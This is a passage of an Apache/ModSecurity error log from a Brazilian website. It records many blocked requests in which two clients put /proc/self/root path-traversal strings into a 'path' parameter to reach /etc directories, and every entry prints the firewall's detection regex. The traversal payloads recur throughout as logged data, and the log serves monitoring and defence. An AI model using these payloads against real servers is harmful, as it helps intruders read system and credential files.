"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeiQkwaGbbGflqUZAKogAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:38.767212 2026] [:error] [pid 8307:tid 140411540502272] [client 74.7.241.31:55300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeir-FhjpZGs9ba8qqiwAAAxg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:40.670411 2026] [:error] [pid 8307:tid 140411632822016] [client 74.7.243.128:51664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzei7-FhjpZGs9ba8qqjQAAAw0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:41.038673 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:55310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzejeoXxyEfFpUF8f9KfQAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:43.092171 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:51680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzejxCii7xarUs8iHYocQAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:43.849451 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.241.31:55320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzej_u8EFLIOrSqIpvlRAAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:46.082685 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:51692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzekgF0L0L-SsrnPo4uZQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:47.552142 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:34420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzekwkwaGbbGflqUZAKrQAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:49.763195 2026] [:error] [pid 8307:tid 140411674785536] [client 74.7.243.128:45546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzelb-FhjpZGs9ba8qqkgAAAwg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:43:51.053877 2026] [proxy_fcgi:error] [pid 7235:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56058] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:43:52.544945 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.241.31:34422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzel_XLqtnMIWvjpaJdkwAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:55.188362 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:34424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzem_u8EFLIOrSqIpvlTAAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:58.273235 2026] [:error] [pid 30424:tid 140411641214720] [client 74.7.241.31:34440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzenct36Dv4L1GW-s-ebgAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:43:58.275913 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:45556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeneoXxyEfFpUF8f9KhgAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:00.963145 2026] [:error] [pid 8307:tid 140411741927168] [client 74.7.241.31:48524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeoL-FhjpZGs9ba8qqlgAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:02.578400 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:48536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeogF0L0L-SsrnPo4ucAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:03.336898 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:44410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeo9a6ubjKNq_cu4aUSwAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:04.355036 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:48540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzepPXLqtnMIWvjpaJdmwAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:06.740953 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:44412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzepvXLqtnMIWvjpaJdngAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:06.742146 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:48554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzepuoXxyEfFpUF8f9KhwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:08.042402 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:44424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeqOoXxyEfFpUF8f9KiQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:08.689873 2026] [:error] [pid 8307:tid 140411540502272] [client 74.7.241.31:46402] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeqL-FhjpZGs9ba8qqnQAAAxg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:10.169576 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:39048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzequoXxyEfFpUF8f9KjgAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:10.941634 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.241.31:46416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeqvqxLDW4GITHUkSopAAAARY"], referer: 